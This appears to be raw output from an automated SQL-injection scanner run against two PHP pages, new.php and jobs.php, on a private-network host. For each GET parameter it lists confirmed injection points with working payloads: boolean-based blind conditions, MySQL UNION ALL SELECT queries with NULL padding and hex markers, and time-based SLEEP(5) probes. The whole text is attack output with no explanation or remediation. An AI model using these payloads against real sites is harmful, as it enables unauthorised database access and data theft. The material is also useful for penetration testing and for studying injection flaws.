http://10.206.6.11/new.php?id=2
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 7636=7636

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-6883 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e6b6871,0x5a4f484f43576e576a46,0x7168696c71),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---

http://10.206.6.11/jobs.php?j_id=1
---
Place: GET
Parameter: j_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: j_id=1 AND 5542=5542

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: j_id=-1409 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71736b7971,0x59444e564f47616e5444,0x7164797071),NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: j_id=1 AND SLEEP(5)
---

